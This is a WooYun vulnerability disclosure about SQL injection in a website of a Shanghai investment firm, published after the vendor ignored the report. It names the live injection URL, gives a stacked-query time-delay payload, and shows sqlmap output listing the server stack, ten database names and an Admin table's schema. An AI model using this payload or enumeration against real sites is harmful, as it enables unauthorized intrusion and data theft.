
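Vulnerability summary (24 followers)

Bug ID: wooyun-2015-0113331

Title: SQL injection in a site of 上海通乾投资股份有限公司

Vendor: 上海通乾投资股份有限公司

Author: Lonely

Submitted: 2015-05-13 19:01

Fixed: 2015-06-27 19:02

Published: 2015-06-27 19:02

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: Unable to contact the vendor, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]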



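Vulnerability details

Disclosure status:

2015-05-13: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-06-27: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

As the title says... it seems they don't take it seriously.

Detailed description:

Injection point: http://www.gold678.com/chart/WH.aspx?code=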

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
[23:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:45:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator.PC-20150414JQWW\.sqlmap\output\www.gold678.com'

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
[23:49:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:49:12] [INFO] fetching database names
[23:49:12] [INFO] fetching number of databases
[23:49:12] [INFO] resumed: 10
[23:49:12] [INFO] resumed: htchartbank
[23:49:12] [INFO] resumed: htweb
[23:49:12] [INFO] resumed: master
[23:49:12] [INFO] resumed: model
[23:49:12] [INFO] resumed: msdb
[23:49:12] [INFO] resumed: ReportServer
[23:49:12] [INFO] resumed: ReportServerTempDB
[23:49:12] [INFO] resumed: Sharetrader
[23:49:12] [INFO] resumed: tempdb
[23:49:12] [INFO] resumed: zzbz
available databases [10]:
[*] htchartbank
[*] htweb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] Sharetrader
[*] tempdb
[*] zzbz
[23:49:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator.PC-20150414JQWW\.sqlmap\output\www.gold678.com'


More than 900 tables. Unbelievable.
<code>web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'htchartbank'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: htchartbank
[952 tables]
Database: htchartbank
Table: Admin
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| id | int |
| password | varchar |
| username | varchar |
+----------+---------+
Database: htchartbank
Table: Admin
[0 entries]
+----+----------+----------+
| id | username | password |
+----+----------+----------+
+----+----------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

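Remediation:

You are the professionals. Any gift?

Copyright notice: when reposting, please credit the source Lonely@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused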